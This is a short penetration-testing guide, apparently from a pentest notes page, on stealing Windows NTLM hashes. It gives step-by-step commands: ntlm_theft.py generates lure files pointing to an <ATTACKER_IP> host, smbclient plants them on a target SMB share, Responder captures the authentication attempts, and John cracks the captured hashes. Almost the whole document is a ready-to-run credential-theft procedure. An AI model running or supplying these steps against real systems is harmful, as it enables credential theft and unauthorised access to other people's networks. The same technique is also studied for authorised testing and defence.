Attacks

Table of Contents

• Dumping NTLM hashes via docx file using NTLM Theft

Dumping NTLM hashes via docx file using NTLM Theft

In this step of the exploitation process, we utilize ntlm_theft.py in conjunction with Responder to steal NTLM hashes from the target system. NTLM hashes are commonly used in Windows environments for authentication and can be valuable for further penetration testing.

https://github.com/Greenwolf/ntlm_theft

1. Generate Malicious Files: Execute ntlm_theft.py with appropriate parameters to generate files containing payloads designed to capture NTLM hashes:

   python3 ntlm_theft.py -g all -s <ATTACKER_IP> -f <OUTPUT_DIRECTORY>

   Explanation of options:

   • -g: Specifies the file types to generate for related attacks.
   • -s: Sets the server's IP, which in this case is the IP address of our Kali machine where Responder will be running.
   • -f: Specifies the filename for the generated files.

2. Upload Files to SMB Share: Upload the generated files to an SMB share on the target system, preferably in a location where they are likely to be accessed:

   smbclient //<TARGET_IP>/<SHARE_NAME> -c "cd <DIRECTORY>; put <FILE_NAME>"

3. Set Up Responder: Start Responder on your attacking machine to listen for LLMNR and NBT-NS requests and capture authentication attempts:

   responder -I <INTERFACE>

4. Trigger Authentication Requests: Wait for a user on the target system to access the uploaded files, triggering authentication requests containing NTLM hashes.

Once you have NTLM hashes, you can crack it with John or Hashcat.

john --format=NT --wordlist=<WORDLIST_FILE> <HASH_FILE>